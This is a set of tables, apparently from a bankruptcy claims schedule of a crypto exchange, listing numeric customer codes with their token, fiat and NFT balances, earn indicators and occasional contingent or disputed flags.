| 07358536 | | BAT[17.16784636], BCH[.05057295], BRZ[1], BTC[.00022031], CUSDT[18], DOGE[64.74024115], ETH[.0005902], ETHW[.0005902], GRT[5.52080929], PAXG[.14142688], SOL[2.46430905], TRX[49.06655298], UNI[1.26024288], USD[0.06], USDT[.39732614] | | |
| 07358537 | | CUSDT[1], USD[0.01] | | |
| 07358539 | | USD[0.00] | | |
| 07358540 | | BAT[1.0165555], BRZ[1], CUSDT[10], TRX[214.72344537], USD[0.75] | Yes | |
| 07358541 | | DOGE[1], USD[0.01] | | |
| 07358542 | | USD[0.01] | | |
| 07358545 | | BRZ[0], DOGE[1], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07358546 | | USD[10.00] | | |
| 07358547 | | BTC[0], ETH[0], ETHW[0.99630321], USD[0.13] | | |
| 07358548 | | CUSDT[8], DOGE[1.92499327], ETH[.0099851], ETHW[.00986189], LTC[.05111261], SOL[.05433778], TRX[3.94018621], USD[0.02] | Yes | |
| 07358549 | | CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07358550 | | CUSDT[1], DOGE[900.67480372], KSHIB[708.401459], SHIB[485821.57763726], USD[0.00] | | |
| 07358551 | | CUSDT[1], DOGE[.08365462], TRX[1], USD[0.01] | Yes | |
| 07358552 | | USD[10.00] | | |
| 07358553 | | USD[0.00], USDT[0] | | |
| 07358554 | | DOGE[139.63295801], USD[0.00] | | |
| 07358555 | | SUSHI[8.73831834], USD[0.00] | | |
| 07358557 | | USD[10.00] | | |
| 07358558 | | USD[10.00] | | |
| 07358559 | | USD[10.00] | | |
| 07358560 | | USD[0.03] | | |
| 07358561 | | BAT[0.00104624], BRZ[1], BTC[0], CUSDT[19], DOGE[1], GRT[0], MATIC[0.00013550], SHIB[7.20258289], SOL[.00001899], UNI[0], USD[0.01] | Yes | |
| 07358562 | | USD[10.00] | | |
| 07358563 | | USD[10.00] | | |
| 07358564 | | USD[10.00] | | |
| 07358566 | | DOGE[25.37240473], USD[0.00] | | |
| 07358567 | | BF_POINT[100], BTC[0], CUSDT[6], DOGE[2], MATIC[0], USD[0.00], USDT[0] | | |
| 07358568 | | USD[10.00] | | |
| 07358570 | | USD[10.00] | | |
| 07358571 | | USD[10.00] | | |
| 07358572 | | USD[10.00] | | |
| 07358574 | | CUSDT[5], DOGE[43.84218211], USD[0.08] | Yes | |
| 07358575 | | CUSDT[235.25773125], LTC[.01289078], SOL[.11258576], SUSHI[.40979146], TRX[133.61596934], USD[0.00], USDT[4.97303075] | | |
| 07358576 | | USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358577 | | CUSDT[1], DOGE[1246.51612396], USD[0.00] | | |
| 07358578 | | DOGE[2.85565545], USD[0.00], USDT[0] | | |
| 07358579 | | USD[10.00] | | |
| 07358580 | | USD[10.00] | | |
| 07358581 | | CUSDT[1], DOGE[442.87784717], LTC[0], TRX[1], USD[0.00] | | |
| 07358582 | | USD[10.00] | | |
| 07358583 | | AAVE[6.07899125], AVAX[11.04095304], BCH[3.59977744], BTC[.01066966], ETH[.18355596], ETHW[.18355596], LINK[53.67960599], USD[0.49], USDT[0.00000001] | | |
| 07358584 | | USD[10.00] | | |
| 07358585 | | DOGE[222.43498397], TRX[1], USD[0.00] | | |
| 07358586 | | TRX[1], USD[0.00] | | |
| 07358587 | | USD[10.00] | | |
| 07358588 | | AAVE[0.00075051], BAT[.02044251], CUSDT[540.79037734], DOGE[7.21591545], ETH[.0000011], ETHW[.0000011], MATIC[0.06419892], SOL[0.01015433], SUSHI[.00120029], TRX[.11646488], USD[0.31] | Yes | |
| 07358590 | | USD[10.00] | | |
| 07358592 | | USD[10.00] | | |
| 07358593 | | USD[10.00] | | |
| 07358594 | | USD[10.84] | Yes | |
| 07358595 | | BRZ[1], CUSDT[7], DOGE[1258.90104017], ETH[0], TRX[326.64621921], USD[0.00] | Yes | |
| 07358596 | | BTC[.00109228], CUSDT[18], DOGE[3], SHIB[4], USD[153.14] | | |
| 07358597 | | EUR[0.00], USD[0.00] | Yes | |
| 07358598 | | USD[10.00] | | |
| 07358599 | | CUSDT[1], DOGE[6], USD[0.01] | | |
| 07358601 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07358602 | | LINK[.3853859], USD[0.00] | Yes | |
| 07358603 | | USD[10.00] | | |
| 07358604 | | BRZ[1], DOGE[6440.7522904], TRX[1], USD[0.00] | | |
| 07358605 | | USD[10.00] | | |
| 07358606 | | DOGE[1], USD[0.00] | | |
| 07358607 | | BRZ[1], CUSDT[4], TRX[2], USD[0.01] | Yes | |
| 07358608 | | USD[10.39] | Yes | |
| 07358609 | | DOGE[.01652596], USD[0.00] | | |
| 07358610 | | CUSDT[1], DOGE[5691.66018284], SHIB[1066523.5876357], TRX[2], USD[0.00] | | |
| 07358611 | | CUSDT[1], TRX[1], USD[6.09] | | |
| 07358612 | | USD[10.00] | | |
| 07358613 | | USD[10.00] | | |
| 07358614 | | USD[10.00] | | |
| 07358615 | | BRZ[1], CUSDT[8], TRX[4], USD[0.00] | | |
| 07358617 | | BRZ[1], CUSDT[9], TRX[3], USD[0.00] | | |
| 07358618 | | CUSDT[4], MATIC[.00649658], USD[0.00] | Yes | |
| 07358619 | | BAT[35.1194491], BTC[.00255076], CUSDT[34], DOGE[200.58638177], ETH[.04468742], ETHW[.04413193], GRT[87.44300666], LINK[5.1082303], MATIC[61.87141338], SHIB[3], SOL[1.46294405], SUSHI[19.79887086], TRX[541.89294445], UNI[4.82724616], USD[0.30] | Yes | |
| 07358620 | | DOGE[2], SUSHI[.00008559], USD[0.00] | | |
| 07358621 | | DOGE[0], USD[0.00] | | |
| 07358622 | | ETH[.00552175], ETHW[.00552175], USD[0.00] | | |
| 07358623 | | USD[10.00] | | |
| 07358624 | | USD[10.00] | | |
| 07358625 | | USD[0.00] | | |
| 07358626 | | USD[10.00] | | |
| 07358627 | | USD[10.00] | | |
| 07358629 | | USD[10.00] | | |
| 07358630 | | BAT[0], CUSDT[2], USD[0.00] | | |
| 07358631 | | USD[10.00] | | |
| 07358632 | | USD[10.00] | | |
| 07358633 | | USD[10.00] | | |
| 07358634 | | BAT[2], BRZ[1], BTC[0], TRX[2], USD[0.00] | | |
| 07358635 | | USD[0.00] | | |
| 07358636 | | BRZ[2], CUSDT[2], GRT[1], TRX[1], USD[0.00] | | |
| 07358637 | | USD[10.00] | | |
| 07358638 | | DOGE[.00000596], USD[5.14] | | |
| 07358639 | | USD[11.08] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358640 | | USD[0.01], USDT[0] | | |
| 07358641 | | BTC[.00000073], CUSDT[2], TRX[2], USD[0.00] | Yes | |
| 07358642 | | CUSDT[1], SUSHI[.00002453], TRX[2], USD[0.77], USDT[0.00000001] | | |
| 07358643 | | DOGE[2.0661638], ETH[.00000024], ETHW[0.00000023], GRT[.00002739], LINK[.0000264], MATIC[.00685851], SHIB[.49007566], SOL[.00020832], USD[0.05], USDT[0.00020096] | Yes | |
| 07358644 | | USD[10.00] | | |
| 07358646 | | USD[10.00] | | |
| 07358647 | | USD[10.00] | | |
| 07358648 | | LINK[.00001346], SOL[.00002112], USD[0.00], USDT[0] | | |
| 07358650 | | BCH[0], BTC[0.00990666], DOGE[0.00738275], ETH[0.09512402], ETHW[0.09408649], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07358651 | | USD[10.00] | | |
| 07358652 | | BRZ[3], BTC[0.00947871], CUSDT[63.17618896], DOGE[.03806766], ETH[.11949931], ETHW[.11834601], TRX[5], USD[29.15] | Yes | |
| 07358653 | | DOGE[682.95480482], USD[0.01] | | |
| 07358654 | | USD[10.00] | | |
| 07358655 | | BRZ[1], CUSDT[1281.72201426], DOGE[4645.59895471], SOL[2.05792499], SUSHI[3.75420245], TRX[4160.75187141], USD[0.00] | Yes | |
| 07358656 | | USD[10.00] | | |
| 07358657 | | DOGE[66.52435976], ETH[0], TRX[25.47061268], USD[0.00], USDT[0] | | |
| 07358658 | | DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07358660 | | USD[10.00] | | |
| 07358661 | | BTC[0.00000001], NFT (299983723132443639/Bahrain Ticket Stub #1037)[1], USD[0.06] | Yes | |
| 07358662 | | BRZ[1], CUSDT[3], ETH[0], USD[0.00] | Yes | |
| 07358663 | | GRT[1], USD[0.00], USDT[0] | | |
| 07358665 | | USD[10.00] | | |
| 07358666 | | TRX[2], USD[0.00], USDT[1] | | |
| 07358667 | | USD[10.00] | | |
| 07358668 | | USD[10.00] | | |
| 07358669 | | USD[10.00] | | |
| 07358670 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07358671 | | GRT[0], USD[0.00] | | |
| 07358672 | | USD[10.00] | | |
| 07358673 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07358675 | | BAT[1], CUSDT[1], DOGE[12173.91987661], USD[10.00] | | |
| 07358676 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07358677 | | USD[10.00] | | |
| 07358678 | | USD[10.00] | | |
| 07358679 | | USD[0.00], YFI[.00022631] | | |
| 07358680 | | AUD[12.59], DOGE[1], USD[0.00] | | |
| 07358681 | | USD[10.00] | | |
| 07358682 | | BTC[.00035756], CUSDT[2], DOGE[412.87083409], TRX[1], USD[0.00] | | |
| 07358683 | | USD[10.00] | | |
| 07358684 | | USD[0.00] | Yes | |
| 07358685 | | BTC[0], ETH[0], LTC[0], USD[0.00] | | |
| 07358687 | | USD[0.01] | | |
| 07358688 | | CUSDT[5], DOGE[0], SOL[1.38506077], TRX[2.54754045], USD[0.00], USDT[0] | | |
| 07358689 | | BRZ[1], BTC[.02000723], CUSDT[2], USD[0.00], USDT[1.10861729] | Yes | |
| 07358690 | | BRZ[1], CUSDT[1], TRX[.66150482], USD[0.47] | | |
| 07358691 | | CUSDT[6], DOGE[1], SOL[9.86230966], TRX[1], UNI[0], USD[52.79] | Yes | |
| 07358692 | | USD[10.00] | | |
| 07358694 | | CUSDT[1], DOGE[3879.99502242], USD[0.00], USDT[1.09179824] | Yes | |
| 07358695 | | USD[10.00] | | |
| 07358697 | | BRZ[1], DOGE[.00037249], USD[0.83] | | |
| 07358698 | | USD[10.00] | | |
| 07358699 | | BRZ[4], DOGE[4], GRT[3376.62168074], MATIC[101.24674544], SHIB[19], TRX[6], USD[0.00], USDT[0.00000001] | | |
| 07358700 | | CUSDT[2], DOGE[.06821084], SHIB[176.65938274], TRX[1], USD[0.00] | Yes | |
| 07358702 | | BRZ[1], CUSDT[22], GRT[15.94482355], TRX[3], USD[0.47] | | |
| 07358703 | | CUSDT[1], TRX[1], USD[0.01], USDT[0.00000686] | | |
| 07358704 | | USD[10.00] | | |
| 07358705 | | DOGE[18.57888855], USD[0.00] | | |
| 07358706 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358707 | | USD[10.00] | | |
| 07358708 | | USD[10.89] | Yes | |
| 07358709 | | CUSDT[2], DOGE[2371.15233899], ETH[.01977381], ETHW[.01977381], USD[0.00] | | |
| 07358710 | | USD[10.00] | | |
| 07358711 | | BAT[.00027661], DOGE[1.00000519], GRT[.00004366], TRX[.0000435], USD[0.00], USDT[0.00000001] | | |
| 07358712 | | BAT[.0000927], BCH[0.00000031], BTC[0.00344877], DOGE[10.92104077], ETH[0.00000001], ETHW[0.00000001], LINK[0], LTC[0], SHIB[40964.15931034], SOL[0], TRX[.00007987], UNI[0], USD[0.00] | | |
| 07358713 | | CUSDT[1], DOGE[.00088225], TRX[1], USD[35.25] | | |
| 07358714 | | KSHIB[456.50114695], USD[0.00] | | |
| 07358715 | | USD[10.00] | | |
| 07358716 | | SOL[.88442648], USD[0.00] | | |
| 07358717 | | CUSDT[13], USD[0.01] | | |
| 07358718 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07358719 | | BRZ[1], CUSDT[5], DOGE[3], NFT (572276676466115535/Entrance Voucher #3742)[1], SHIB[4], TRX[1], USD[127.98] | | |
| 07358720 | | USD[10.00] | | |
| 07358721 | | BRZ[1], CUSDT[3], DOGE[.94237485], TRX[1.07569706], USD[0.11] | | |
| 07358722 | | USD[10.00] | | |
| 07358723 | | USD[10.00] | | |
| 07358725 | | USD[10.00] | | |
| 07358726 | | ETH[0], ETHW[.0000134], LINK[0], SHIB[1], SUSHI[0.00001581], USD[7197.27], USDT[0.00111846] | Yes | |
| 07358727 | | BTC[.00006519], USD[0.00] | | |
| 07358728 | | BF_POINT[200], ETH[0.00006879], ETHW[0.00004827], SOL[0], USD[38812.00], USDT[0] | Yes | |
| 07358729 | | DOGE[.08299629], USD[0.00] | | |
| 07358730 | | DAI[0], USD[0.00] | | |
| 07358732 | | USD[10.00] | | |
| 07358733 | | USD[10.00] | | |
| 07358734 | | BRZ[1], CUSDT[2], DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07358735 | | USD[10.00] | | |
| 07358736 | | USD[9.40] | | |
| 07358737 | | USD[10.00] | | |
| 07358738 | | USD[0.00] | | |
| 07358740 | | BTC[.00021612], CUSDT[2], DOGE[180.77260166], KSHIB[427.08888103], SHIB[17483.51748251], TRX[1], USD[0.19] | | |
| 07358741 | | USD[10.00] | | |
| 07358742 | | USD[10.00] | | |
| 07358743 | | CUSDT[1], DOGE[.43220426], TRX[1], USD[0.13] | | |
| 07358744 | | USD[10.00] | | |
| 07358745 | | USD[10.00] | | |
| 07358746 | | USD[0.00] | | |
| 07358747 | | USD[0.00] | | |
| 07358748 | | CUSDT[1], DOGE[1215.16014352], USD[10.01] | | |
| 07358749 | | BRZ[3], CUSDT[5], DOGE[41824.26313506], ETH[2.15676209], ETHW[2.15585646], LINK[10.95626797], TRX[216.8162667], USD[0.04] | Yes | |
| 07358751 | | TRX[202.34429186], USD[0.00] | Yes | |
| 07358752 | | DOGE[1], TRX[169.70696698], USD[0.00] | | |
| 07358753 | | USD[10.00] | | |
| 07358754 | | CUSDT[4], DOGE[520.70451902], TRX[2], USD[0.00] | | |
| 07358755 | | USD[10.00] | | |
| 07358756 | | DOGE[1.00004185], USD[36.14] | | |
| 07358757 | | USD[10.00] | | |
| 07358758 | | CUSDT[1023.95270595], DOGE[866.00176041], ETH[.02003317], ETHW[.01978693], USD[0.00] | Yes | |
| 07358759 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], ETH[0], SHIB[1], USD[707.36], USDT[1.02543197] | Yes | |
| 07358760 | | USD[25007.39] | | |
| 07358761 | | BRZ[1], CUSDT[1], DOGE[1.00002043], TRX[1], USD[0.00] | | |
| 07358762 | | CUSDT[2], DOGE[56.14647232], USD[0.00] | | |
| 07358763 | | TRX[1], USD[0.00] | | |
| 07358765 | | USD[10.00] | | |
| 07358766 | | USD[10.00] | | |
| 07358767 | | USD[10.00] | | |
| 07358768 | | CUSDT[1], USD[0.00] | Yes | |
| 07358769 | | BTC[.00013335], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358770 | | USD[10.00] | | |
| 07358771 | | DOGE[18.66557752], USD[0.00] | Yes | |
| 07358772 | | AAVE[.3329622], BCH[.19706939], BRZ[68.22612914], CUSDT[289.27155245], DOGE[412.57265729], GRT[11.61978254], LINK[.87250531], LTC[.30850704], MATIC[11.51238906], SOL[.29338007], TRX[56.29203187], UNI[.04536213], USD[3.58], USDT[11.44081066] | Yes | |
| 07358773 | | BAT[0], BRZ[1], BTC[0], CUSDT[5], DOGE[4], ETH[0], GRT[0], LINK[0], MATIC[0.02719761], SHIB[562274688.67480903], SOL[0], SUSHI[0], TRX[8.23261985], USD[0.00], USDT[0] | Yes | |
| 07358774 | | BRZ[1], BTC[.00040817], CUSDT[2], DOGE[217.20516282], SHIB[2177059.13906199], TRX[1], USD[0.00] | Yes | |
| 07358775 | | DOGE[166.50418633], USD[0.00] | | |
| 07358776 | | USD[10.00] | | |
| 07358777 | | BAT[1], BRZ[1], CUSDT[2], ETH[.00003966], ETHW[.00003966], SHIB[1], SUSHI[12.22830079], TRX[1], USD[0.00] | | |
| 07358778 | | USD[10.00] | | |
| 07358779 | | DOGE[124.54196578], USD[0.00] | | |
| 07358780 | | BAT[8.5186046], BTC[.00009581], USD[0.00] | | |
| 07358781 | | BTC[0], DOGE[0], ETH[0], GRT[0], MATIC[10], SUSHI[0], TRX[0], USD[1.90], USDT[0] | | |
| 07358782 | | USD[10.00] | | |
| 07358784 | | USD[10.00] | | |
| 07358785 | | CUSDT[1], USD[0.01] | | |
| 07358787 | | USD[10.00] | | |
| 07358789 | | USD[10.00] | | |
| 07358790 | | BRZ[3], CUSDT[7], DOGE[0], ETH[0], ETHW[0], KSHIB[149.87268315], SHIB[2428826.91931703], TRX[2], USD[0.00], USDT[0.00001927] | Yes | |
| 07358791 | | DOGE[17.82685757], USD[0.00] | | |
| 07358793 | | DOGE[1.00003099], USD[0.01] | | |
| 07358794 | | CUSDT[1], USD[0.00] | | |
| 07358795 | | BRZ[2], CUSDT[7], DOGE[128.45000869], TRX[1], USD[0.50] | | |
| 07358796 | | DOGE[131.74219465], USD[0.02] | | |
| 07358797 | | USD[10.00] | | |
| 07358798 | | USD[10.00] | | |
| 07358799 | | CUSDT[2], DOGE[1008.01605821], USD[0.00] | Yes | |
| 07358800 | | GRT[4.42244539], USD[0.00] | Yes | |
| 07358801 | | USD[10.00] | | |
| 07358802 | | USD[10.00] | | |
| 07358803 | | USD[10.00] | | |
| 07358805 | | CUSDT[2], DOGE[4475.42940934], ETH[.00277693], ETHW[.00273643], USD[0.00], USDT[0] | Yes | |
| 07358806 | | USD[10.00] | | |
| 07358807 | | BRZ[1], CUSDT[2], DOGE[550.63539571], SHIB[6253034.69624905], USD[14.72] | Yes | |
| 07358808 | | BRZ[2], CUSDT[4], DOGE[168.34313782], TRX[2], USD[0.00] | | |
| 07358809 | | CUSDT[518.25760451], USD[0.00] | Yes | |
| 07358810 | | DOGE[1], USD[0.00] | | |
| 07358811 | | BAT[1.01655549], CUSDT[6], ETH[.00000021], ETHW[.02266709], SOL[.00006608], TRX[2], USD[0.00] | Yes | |
| 07358812 | | BAT[23.8191422], BRZ[0.00000003], BTC[.00010045], CUSDT[1], DOGE[0], PAXG[.02156651], SOL[0], USD[0.00] | | |
| 07358813 | | USD[10.00] | | |
| 07358814 | | CUSDT[5], DOGE[6294.42053413], ETH[.05525472], ETHW[.05525472], TRX[692.08366618], USD[0.00] | | |
| 07358815 | | USD[10.00] | | |
| 07358816 | | DOGE[0], ETHW[0], SHIB[2], SOL[25.86924941], USD[0.00], USDT[0] | Yes | |
| 07358817 | | CUSDT[5], DOGE[0], GRT[1], TRX[1], USD[0.01] | | |
| 07358818 | | USD[10.00] | | |
| 07358819 | | USD[0.00] | | |
| 07358820 | | USD[10.00] | | |
| 07358821 | | BRZ[1], CUSDT[1], DAI[0], DOGE[2368.73366560], GRT[1.21104328], NFT (358396220443378106/Beware of guns )[1], NFT (553024318371023223/Crunch )[1], SHIB[8396201.74354538], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07358822 | | USD[10.00] | | |
| 07358823 | | CUSDT[1], DOGE[.00003165], USD[0.00] | | |
| 07358825 | | USD[10.00] | | |
| 07358826 | | BTC[.00002159], USD[9.00] | | |
| 07358827 | | DOGE[6596.16595735], USD[0.00] | Yes | |
| 07358828 | | USD[0.00], USDT[0.00000001] | | |
| 07358830 | | USD[0.00] | | |
| 07358831 | | USD[10.00] | | |
| 07358832 | | USD[10.00] | | |
| 07358833 | | CUSDT[1], DOGE[2], LINK[.00003387], TRX[1], USD[0.00] | | |
| 07358834 | | BAT[73.10657011], BRZ[1], CUSDT[2], SHIB[1], TRX[753.34534378], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358835 | | CUSDT[2], DOGE[2065.30909789], LTC[.01004813], MATIC[34.88451038], TRX[228.75992714], USD[0.16] | Yes | |
| 07358836 | | USD[10.00] | | |
| 07358837 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07358838 | | BAT[1], CUSDT[1], DOGE[2], ETH[1.01304206], GRT[255.22682331], SHIB[1456004.67454751], USD[0.21] | Yes | |
| 07358839 | | BRZ[1], ETH[.00000069], ETHW[.0758751], SHIB[2], USD[0.01], USDT[0.00000001] | Yes | |
| 07358841 | | USD[0.01] | | |
| 07358842 | | DOGE[.111], USD[10.50] | | |
| 07358843 | | CUSDT[1], DOGE[17299.99667578], GRT[1], TRX[4], USD[0.65] | | |
| 07358844 | | USD[10.00] | | |
| 07358845 | | USD[10.00] | | |
| 07358846 | | USD[0.55] | | |
| 07358848 | | USD[10.00] | | |
| 07358849 | | USD[0.00], USDT[0] | Yes | |
| 07358851 | | DOGE[12.96575473], SUSHI[0], USD[0.00] | | |
| 07358852 | | BTC[.00021911], UNI[.00000007], USD[0.00] | | |
| 07358853 | | USD[10.00] | | |
| 07358854 | | USD[10.00] | | |
| 07358855 | | USD[10.00] | | |
| 07358856 | | USD[10.00] | | |
| 07358857 | | BRZ[1], CUSDT[2], DAI[.00058058], TRX[1], USD[0.00] | | |
| 07358858 | | USD[10.00] | | |
| 07358859 | | BRZ[2], CUSDT[3], DOGE[89.99511403], TRX[1], USD[0.01] | | |
| 07358860 | | DOGE[3], USD[0.11] | Yes | |
| 07358861 | | USD[10.00] | | |
| 07358864 | | DOGE[1.00589127], TRX[151.25820858], USD[0.65] | | |
| 07358865 | | USD[10.00] | | |
| 07358866 | | USD[10.00] | | |
| 07358867 | | USD[10.00] | | |
| 07358869 | | BAT[0], BRZ[0], GRT[0], PAXG[0], SOL[38.46880209], TRX[0], USD[0.00], USDT[0.00000180] | Yes | |
| 07358870 | | USD[10.00] | | |
| 07358871 | | USD[0.00] | | |
| 07358872 | | USD[10.00] | | |
| 07358873 | | CUSDT[3], GRT[2], TRX[1], USD[0.22], USDT[1] | | |
| 07358874 | | BTC[.0002988], ETH[.00000001], ETHW[0], GRT[0.55345657], USD[1.63] | | |
| 07358875 | | BRZ[1], CUSDT[2], DOGE[.00004671], USD[0.00] | | |
| 07358876 | | BAT[9.04134385], CUSDT[1], TRX[2], USD[0.00] | | |
| 07358877 | | TRX[1], USD[31.70] | | |
| 07358878 | | BAT[16.79273573], USD[0.00] | | |
| 07358879 | | USD[10.00] | | |
| 07358880 | | USD[10.00] | | |
| 07358881 | | USD[10.00] | | |
| 07358882 | | USD[10.00] | | |
| 07358883 | | USD[10.00] | | |
| 07358884 | | USD[10.00] | | |
| 07358885 | | DOGE[1.00058692], USD[0.01] | Yes | |
| 07358886 | | USD[0.45] | Yes | |
| 07358887 | Contingent, Disputed | USD[10.00] | | |
| 07358888 | | CUSDT[1], USD[43.47] | | |
| 07358889 | | BTC[.00036614], CUSDT[1], DOGE[1508.45820413], USD[10.00] | | |
| 07358890 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07358892 | | BAT[11.40622033], BCH[.01248247], BTC[.00005818], CUSDT[1], SOL[.09295785], TRX[1], UNI[.08841951], USD[0.00] | Yes | |
| 07358894 | | BRZ[1], CUSDT[2], TRX[3.23794592], USD[0.00] | | |
| 07358895 | | USD[10.79] | Yes | |
| 07358896 | | USD[10.00] | | |
| 07358897 | | BTC[.00020945], USD[0.00] | Yes | |
| 07358898 | | BAT[1], BTC[.00020965], CUSDT[2], DOGE[1], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07358899 | | USD[10.00] | | |
| 07358900 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358901 | | USD[0.00] | | |
| 07358902 | | ALGO[1.1812], DOGE[1610.85480128], GRT[8.31276944], KSHIB[144.26268987], LTC[.3630721], MATIC[3.51780039], SHIB[585522.85210187], SOL[0.67001593], USD[0.00] | | |
| 07358904 | | USD[10.00] | | |
| 07358906 | | BTC[0.00017822], SUSHI[250.992] | | |
| 07358907 | | USD[10.00] | | |
| 07358909 | | USD[10.00] | | |
| 07358910 | | DOGE[206.77908993], ETH[.00001202], ETHW[.00001202], USD[0.00] | Yes | |
| 07358911 | | USD[0.03], USDT[0] | | |
| 07358912 | | DOGE[2], USD[0.01] | | |
| 07358913 | | BRZ[1], BTC[.00000014], CUSDT[1], GRT[1.00396203], LINK[.00057691], USD[0.09] | Yes | |
| 07358914 | | BCH[6.0381519], BRZ[1], CUSDT[15], DOGE[2472.80373632], NFT (364957942777316249/Entrance Voucher #2942)[1], TRX[2], USD[10.86] | Yes | |
| 07358915 | | BRZ[3], CUSDT[4], DOGE[120.97068889], TRX[6], USD[0.60] | Yes | |
| 07358916 | | BAT[0], BRZ[1], CUSDT[1], DOGE[2175.19346046], ETH[0], ETHW[0], GRT[1.00498957], SHIB[1], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00001014] | Yes | |
| 07358917 | | CUSDT[1], DOGE[2], LTC[0], TRX[1884.87481039], USD[0.00] | Yes | |
| 07358919 | | USD[10.00] | | |
| 07358920 | | SOL[.00000001], USD[0.00] | Yes | |
| 07358921 | | USD[10.00] | | |
| 07358922 | | USD[10.00] | | |
| 07358923 | | BAT[21.55736807], USD[0.00] | | |
| 07358924 | | USD[10.00] | | |
| 07358925 | | USD[10.00] | | |
| 07358926 | | BF_POINT[100], BRZ[7.57830314], BTC[.01184605], CUSDT[7], DOGE[3130.61773449], ETH[0.89253662], ETHW[0.89216172], GRT[2.00063949], LTC[.5178478], SOL[33.78509949], TRX[3], USD[4523.39] | Yes | |
| 07358927 | | BTC[.0000866], DOGE[70.69037268], ETH[.00054769], ETHW[.00054769], USD[0.00], USDT[0.00321621] | | |
| 07358928 | | USD[10.00] | | |
| 07358929 | | DOGE[217.22420778], USD[0.00] | Yes | |
| 07358930 | | BRZ[1], DOGE[7519.31979388], TRX[1], USD[6.14], USDT[1] | | |
| 07358931 | | BRZ[1], USD[0.01] | | |
| 07358932 | | TRX[0], USD[0.00] | | |
| 07358933 | | USD[10.00] | | |
| 07358934 | | DOGE[409.91367073], USD[45.00] | | |
| 07358935 | | USD[0.00] | | |
| 07358936 | | SHIB[2795008.80478819], USD[0.00] | | |
| 07358937 | | BRZ[59.38132916], USD[0.00] | Yes | |
| 07358938 | | USD[10.00] | | |
| 07358939 | | CUSDT[1], ETH[0.00560748], ETHW[0.00553908], USD[0.00] | Yes | |
| 07358940 | | USD[0.00] | | |
| 07358941 | | USD[10.00] | | |
| 07358942 | | USD[0.01] | | |
| 07358943 | | BTC[.02179909], GRT[1], TRX[1], USD[0.00] | | |
| 07358944 | | BRZ[11.61171214], CUSDT[1], USD[0.01] | | |
| 07358945 | | USD[10.00] | | |
| 07358946 | | CUSDT[1], DOGE[744.65320965], USD[0.00] | | |
| 07358947 | | USD[10.00] | | |
| 07358948 | | USD[10.00] | | |
| 07358949 | | USD[10.00] | | |
| 07358950 | | TRX[.00001143], USD[0.00] | | |
| 07358951 | | AUD[0.00], BCH[0], BTC[0], DOGE[0], GBP[0.00], KSHIB[0], SGD[0.00], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07358952 | | BRZ[0], BTC[0], DOGE[1], ETH[0], ETHW[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000001] | | |
| 07358953 | | DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07358954 | | BAT[15.43714703], BRZ[30.08520998], CUSDT[267.69524228], DOGE[239.50922856], LINK[.67922541], SUSHI[1.48876523], USD[0.00], USDT[0.15678315] | Yes | |
| 07358955 | | USD[10.00] | | |
| 07358956 | | CUSDT[4], USD[0.00] | | |
| 07358958 | | USD[10.00] | | |
| 07358959 | | DOGE[.33334633], SOL[.96231194], USD[-2.57] | Yes | |
| 07358960 | | BAT[536.72726737], BRZ[4], CUSDT[4737.80399968], DOGE[3318.2441542], ETH[.06375087], ETHW[.06375087], GRT[95.69238679], LINK[5.62323231], LTC[3.29889779], MATIC[170.10471608], SHIB[2412799.72399516], SOL[6.89524487], SUSHI[7.14795903], TRX[5109.63432296], UNI[6.85793213], USD[46.63] | | |
| 07358961 | | USD[10.00], USDT[1] | | |
| 07358962 | | CUSDT[1], USD[0.00], USDT[1] | | |
| 07358963 | | BRZ[2], CUSDT[2], DOGE[62.08064350], TRX[1.25048855], USD[0.75], USDT[0.44981941] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358964 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07358966 | | BAT[1], CUSDT[1], DOGE[2], USD[10.00] | | |
| 07358967 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1219.04436259], SHIB[5876654.22384128], TRX[1], USD[0.01] | | |
| 07358968 | | CUSDT[3], DOGE[0], USD[0.00], USDT[0] | | |
| 07358969 | | BRZ[2], CUSDT[1], DOGE[490.91244811], GRT[20.02739333], TRX[578.51852765], USD[620.66] | | |
| 07358970 | | USD[10.00] | | |
